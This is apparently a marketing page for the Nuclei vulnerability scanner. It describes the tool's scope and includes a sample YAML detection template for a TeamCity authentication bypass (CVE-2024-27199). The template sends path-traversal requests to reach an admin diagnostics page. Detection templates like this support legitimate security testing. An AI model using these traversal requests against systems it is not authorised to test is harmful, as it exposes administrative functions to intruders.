no matter who you are, Nuclei can help

Nuclei is a modern, high-performance vulnerability scanner that leverages simple YAML-based templates.

Earth from space at night

30K+

Stars On Github Repo

900+

Nuclei contributors

10K+

Templates created

50M+

Scans per month

Write your own detection templates using AI powered by our Nuclei open source library

Leverage the global security community to streamline your vulnerability management. With a template library full of contributions from pentest, bug bounty, and security teams to automate the most complex vulnerability detection.

id: CVE-2024-27199

info:
  name: TeamCity < 2023.11.4 - Authentication Bypass
  author: DhiyaneshDk
  severity: high
  description: |
    In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible
  reference:
    - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27199
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cwe-id: CWE-23
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"TeamCity"
  tags: cve,cve2024,teamcity,jetbrains,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/res/../admin/diagnostic.jsp"
      - "{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp"
      - "{{BaseURL}}/update/../admin/diagnostic.jsp"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "Debug Logging", "CPU & Memory Usage")'
        condition: and
# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950

Put Nuclei to work

Find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

Web Application

Identify common web vulnerabilities with an active library of community-powered templates.

Cloud

Examine cloud environments and infrastructure for misconfigurations and vulnerabilities.

Network Security

Scan non web services like SSH, FTP, SMB, and more.

API

Test APIs with an active library of known vulnerabilities and misconfigurations.

Infrastructure

Audit server configurations, open ports, and services for security issues.

CI/CD

Integrate into your existing pipelines to minimize issues resurfacing into production.